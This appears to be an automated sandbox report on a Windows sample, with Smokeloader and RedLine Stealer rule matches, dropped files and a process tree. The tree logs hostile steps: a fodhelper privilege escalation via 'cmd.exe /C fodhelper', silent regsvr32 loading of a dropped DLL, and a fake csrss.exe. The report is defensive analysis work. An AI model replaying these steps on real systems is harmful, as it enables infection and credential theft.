Source: 00000000.00000002.1690637836.0000000002211000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000025.00000002.2228180435.0000000002B72000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000002B.00000002.2209552355.0000000005600000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001A.00000002.2142714397.0000000000731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000003.00000002.1928946704.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000003.00000002.1929009378.00000000005CC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001A.00000002.2142554421.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000025.00000002.2228451591.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001D.00000002.4256567957.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: 2E76.exe.1.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: D8BF.dll.1.dr	Static PE information: Section: .rdata ZLIB complexity 0.9957866053427419
Source: D8BF.dll.1.dr	Static PE information: Section: .qdata ZLIB complexity 0.9983695896192529
Source: D8BF.dll.1.dr	Static PE information: Section: CONST ZLIB complexity 0.9928474845467034

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@106/79@2042/100

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe

Code function: 0_2_0071E236 CreateToolhelp32Snapshot,Module32First,

0_2_0071E236

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe

Code function: 0_2_004279E0 GetModuleFileNameW,LoadResource,

0_2_004279E0

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\ibjhisi

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:5808:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7044
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6364:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:4416:64:WilError_03
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2232
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:2108:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:5448:64:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6844

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\CA65.tmp

Source: xqz8sQ4mZB.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\4E3.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\user\Searches\desktop.ini

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: xqz8sQ4mZB.exe

ReversingLabs: Detection: 35%

Source: RegSvcs.exe

String found in binary or memory: MyRnHu--Install

Source: unknown	Process created: C:\Users\user\Desktop\xqz8sQ4mZB.exe C:\Users\user\Desktop\xqz8sQ4mZB.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ibjhisi C:\Users\user\AppData\Roaming\ibjhisi
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\CA65.exe C:\Users\user\AppData\Local\Temp\CA65.exe
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Process created: C:\Users\user\AppData\Local\Temp\CA65.exe C:\Users\user\AppData\Local\Temp\CA65.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D217.exe C:\Users\user\AppData\Local\Temp\D217.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\D8BF.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\D8BF.dll
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 6844 -ip 6844
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\DFD5.exe C:\Users\user\AppData\Local\Temp\DFD5.exe
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6844 -s 788
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 7044 -ip 7044
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 1364
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6844 -ip 6844
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 7044 -ip 7044
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 1364
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2232 -ip 2232
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2232 -ip 2232
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 848
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 828
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F6A9.exe C:\Users\user\AppData\Local\Temp\F6A9.exe
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4E3.exe C:\Users\user\AppData\Local\Temp\4E3.exe
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\fodhelper.exe	Process created: C:\Users\user\AppData\Local\Temp\4E3.exe "C:\Users\user\AppData\Local\Temp\4E3.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\1DCB.exe C:\Users\user\AppData\Local\Temp\1DCB.exe
Source: C:\Users\user\AppData\Local\Temp\1DCB.exe	Process created: C:\Users\user\AppData\Local\Temp\is-0PU8C.tmp\1DCB.tmp "C:\Users\user\AppData\Local\Temp\is-0PU8C.tmp\1DCB.tmp" /SL5="$E0426,7353157,54272,C:\Users\user\AppData\Local\Temp\1DCB.exe"
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\consent.exe consent.exe 5704 448 0000021C6C8372A0
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Users\user\AppData\Local\Temp\is-0PU8C.tmp\1DCB.tmp	Process created: C:\Users\user\AppData\Local\Temp\1DCB.exe "C:\Users\user\AppData\Local\Temp\1DCB.exe" /SPAWNWND=$A031E /NOTIFYWND=$E0426
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\CA65.exe C:\Users\user\AppData\Local\Temp\CA65.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D217.exe C:\Users\user\AppData\Local\Temp\D217.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\D8BF.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\DFD5.exe C:\Users\user\AppData\Local\Temp\DFD5.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\CA65.exe C:\Users\user\AppData\Local\Temp\CA65.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4E3.exe C:\Users\user\AppData\Local\Temp\4E3.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\1DCB.exe C:\Users\user\AppData\Local\Temp\1DCB.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Process created: C:\Users\user\AppData\Local\Temp\CA65.exe C:\Users\user\AppData\Local\Temp\CA65.exe	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\D8BF.dll
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 6844 -ip 6844
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6844 -s 788
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 7044 -ip 7044
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 1364
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6844 -ip 6844
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 7044 -ip 7044
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7044 -s 1364
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2232 -ip 2232
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2232 -ip 2232
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 848
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 828
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: C:\Users\user\AppData\Local\Temp\is-0PU8C.tmp\1DCB.tmp "C:\Users\user\AppData\Local\Temp\is-0PU8C.tmp\1DCB.tmp" /SL5="$E0426,7353157,54272,C:\Users\user\AppData\Local\Temp\1DCB.exe"
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\consent.exe consent.exe 5704 448 0000021C6C8372A0
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Local\Temp\1DCB.exe "C:\Users\user\AppData\Local\Temp\1DCB.exe" /SPAWNWND=$A031E /NOTIFYWND=$E0426
Source: C:\Windows\System32\fodhelper.exe	Process created: C:\Users\user\AppData\Local\Temp\4E3.exe "C:\Users\user\AppData\Local\Temp\4E3.exe"
Source: C:\Users\user\AppData\Local\Temp\4E3.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Users\user\AppData\Local\Temp\1DCB.exe	Process created: C:\Users\user\AppData\Local\Temp\is-0PU8C.tmp\1DCB.tmp "C:\Users\user\AppData\Local\Temp\is-0PU8C.tmp\1DCB.tmp" /SL5="$E0426,7353157,54272,C:\Users\user\AppData\Local\Temp\1DCB.exe"
Source: C:\ProgramData\Drivers\csrss.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1DCB.exe	Process created: unknown unknown

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\DFD5.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\System32\fodhelper.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Detected unpacking (changes PE section rights)

Source:	Binary string: \??\C:\Windows\System.Windows.Forms.pdb source: DFD5.exe, 0000000D.00000002.2086366005.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: EfiGuardDxe.pdb7 source: 4E3.exe, 0000001D.00000002.4256235874.0000000002B6C000.00000040.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: DFD5.exe, 0000000D.00000002.2094970105.000000006CA34000.00000002.00000001.01000000.0000000E.sdmp, DFD5.exe, 0000000D.00000002.2087944022.0000000004319000.00000004.00000800.00020000.00000000.sdmp, DFD5.exe, 0000000D.00000002.2087944022.00000000041E9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\installed_settings_to_improve_the_installation.pdb source: DFD5.exe, 0000000D.00000002.2086366005.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: installed_settings_to_improve_the_installation.pdblation.pdbpdbion.pdblation.pdb source: DFD5.exe, 0000000D.00000002.2086173877.00000000012F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: KK.pdb source: DFD5.exe, 0000000D.00000002.2086173877.00000000012F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: oC:\Users\user\AppData\Local\Temp\installed_settings_to_improve_the_installation.pdb\ source: DFD5.exe, 0000000D.00000002.2086173877.00000000012F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\installed_settings_to_improve_the_installation.pdb source: DFD5.exe, 0000000D.00000002.2086173877.00000000012F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdbm source: DFD5.exe, 0000000D.00000002.2086366005.00000000013C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\installed_settings_to_improve_the_installation.pdbpdbion.pdb9 source: DFD5.exe, 0000000D.00000002.2086366005.00000000013C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: installed_settings_to_improve_the_installation.pdb\Users\user\AppData\Local\Temp\DFD5.PDB source: DFD5.exe, 0000000D.00000002.2086173877.00000000012F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb\ source: DFD5.exe, 0000000D.00000002.2092031983.0000000005800000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\DFD5.PDB source: DFD5.exe, 0000000D.00000002.2086366005.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\installed_settings_to_improve_the_installation.pdb source: DFD5.exe, 0000000D.00000002.2086366005.000000000138E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: o.pdb source: DFD5.exe, 0000000D.00000002.2086173877.00000000012F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\installed_settings_to_improve_the_installation.pdb9h source: DFD5.exe, 0000000D.00000002.2086366005.000000000138E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\installed_settings_to_improve_the_installation.pdbz} source: DFD5.exe, 0000000D.00000002.2086366005.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Windows.Forms.pdb$ source: DFD5.exe, 0000000D.00000002.2086366005.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\installed_settings_to_improve_the_installation.pdb source: DFD5.exe, 0000000D.00000002.2086366005.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n\|C:\Windows\installed_settings_to_improve_the_installation.pdb source: DFD5.exe, 0000000D.00000002.2086173877.00000000012F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\installed_settings_to_improve_the_installation.pdb source: DFD5.exe, 0000000D.00000002.2092031983.0000000005800000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: installed_settings_to_improve_the_installation.pdb source: DFD5.exe, 0000000D.00000002.2086173877.00000000012F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: DFD5.exe, 0000000D.00000002.2086366005.00000000013C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb source: DFD5.exe, 0000000D.00000002.2092031983.0000000005800000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: DFD5.exe, 0000000D.00000002.2087944022.000000000442E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdb source: DFD5.exe, 0000000D.00000002.2086366005.000000000140E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: installed_settings_to_improve_the_installation.pdb3 source: DFD5.exe, 0000000D.00000002.2086366005.000000000140E000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

